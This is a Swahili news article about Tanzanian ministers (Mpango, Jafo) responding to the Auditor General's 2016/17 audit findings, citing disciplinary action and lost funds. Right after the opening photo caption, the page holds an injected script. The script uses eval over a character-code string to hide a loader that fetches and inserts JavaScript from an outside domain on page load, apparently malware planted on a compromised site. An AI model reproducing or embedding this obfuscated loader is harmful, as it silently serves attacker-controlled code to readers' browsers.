<p>Mdhibiti na Mkaguzi Mkuu wa Hesabu za Serikali (CAG) Profesa Mussa Assad.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Na Steven Samwel – Dodoma.
Waziri wa fedha na mipango, Dk. Philip Mpango na waziri wan chi ofisi ya rais tawala za mikoa na serikali za mitaa tamisemi, Selemani Jafo, wameelezea kuhusu utekelezaji wa baadhi ya mapendekezo ya mdhibiti na mkaguzi mkuu wa hesabu za serikali katika wizara zao kwa mwaka ulioishia Juni 30, 2017.
Dk. Mpango waziri wa fedha na mipango amesema serikali imechukua hatua za kinidhamu na kisheria kwa mtumishi anayehusika na upotevu wa fedha kiasi cha shilingi milioni 332.86 kwa kumrudisha nchini kutoka ubalozini na kufikishwa mahakamani ili fedha za watanzania zirejeshwe.
Pia amesema kuongezeka kwa deni la matibabu nje ya nchi kwa shilingi bilioni 17.13 kumetokana na wagonjwa wanaoandikiwa kurudi kwa matibabu ya muda mrefu.
Naye waziri wa Tamisemi, Mh. Jafo amesema novemba mwaka jana ofisi yake ilifanya ufuatiliaji na kujiridhisha kuwa maelekezo yote yalitekelezwa ipasavyo ambapo jumla ya watumishi 434 wamechukuliwa hatua mbalimbali za kinidhamu na kisheria baada ya kubainika kuwa wamezisababishia halmashauri zao hasara au hoja za ukaguzi zisizo za lazima kutokana na kutotekeleza ipasavyo wajibu wao au kujihusisha na vitendo vya ubadhilifu.
Aidha, amesema serikali inakubaliana na mapendekezo yaliyotolewa na CAG kuwa mamlaka za serikali za mitaa ziwe zinapatiwa fedha za ruzuku kwa matumizi ya kawaidana ya maendeleokwa wakati na kiasi kilichoidhinishwa ili ziweze kutoa huduma kwa wananchi.
Kufuatia CAG Prof. Mussa Assad kutoa taarifa kuhusiana na mapendekezo ya utekelezaji wa hesabu za serikali kwa mwaka unaoishia Juni 30, 2017 mawaziri mbalimbali wameanza kuelezea hatua walizochukua.
Recent Comments